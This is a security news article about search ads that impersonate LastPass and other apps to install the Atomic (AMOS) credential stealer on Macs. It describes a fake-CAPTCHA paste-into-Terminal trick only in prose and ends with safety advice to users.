Ads prominently displayed on search engines are impersonating a wide range of online services in a bid to infect Macs with a potent credential stealer, security companies have warned. The latest reported target is users of the LastPass password manager.
Late last week, LastPass said it detected a widespread campaign that used search engine optimization to display ads for LastPass macOS apps at the top of search results returned by search engines, including Google and Bing. The ads led to one of two fraudulent GitHub sites targeting LastPass, both of which have been taken down. The pages provided links promising to install LastPass on MacBooks. In fact, they installed a macOS credential stealer known as Atomic Stealer, or alternatively, Amos Stealer.
Dozens targeted
“We are writing this blog post to raise awareness of the campaign and protect our customers while we continue to actively pursue takedown and disruption efforts, and to also share indicators of compromise (IoCs) to help other security teams detect cyber threats,” LastPass said in the post.
LastPass is hardly alone in seeing its well-known brand exploited in such ads. The compromise indicators LastPass provided listed other software or services being impersonated as 1Password, Basecamp, Dropbox, Gemini, Hootsuite, Notion, Obsidian, Robinhood, Salesloft, SentinelOne, Shopify, Thunderbird, and TweetDeck. Typically, the ads offer the software in prominent fonts. When clicked, the ads lead to GitHub pages that install versions of Atomic that are disguised as the official software being falsely advertised.
The malicious installers sometimes offer to install the stealer through the downloading of a file in the Mac-proprietary .dmg format. After Apple added a detection to Gatekeeper—the malware protection built into macOS that blocks the installation of known malware—attackers started using a new method that bypassed it. This method masqueraded as a CAPTCHA, ostensibly to prove the user wasn’t a bot, by requiring the copying of a text string and pasting it into the Mac terminal window. In reality, the string was a command to download and install the malicious .dmg with no intervention from Gatekeeper. Researchers have warned of this Gatekeeper-bypassing technique for at least the past 20 months.
Despite attempts to raise awareness about Atomic, people have continued to use it widely, an indication that it remains effective. The post linked immediately above reports it being used against users of Homebrew, a tool that’s indispensable for many developers of macOS-compatible apps.
People should download software only from links provided on a site’s official webpage. In the event they view an ad and decide they want to install the app being promoted, they should open a new tab and visit the official website directly, rather than clicking on the download link in the ad. More information about Atomic is available here and here.
This is part of Disney’s legacy now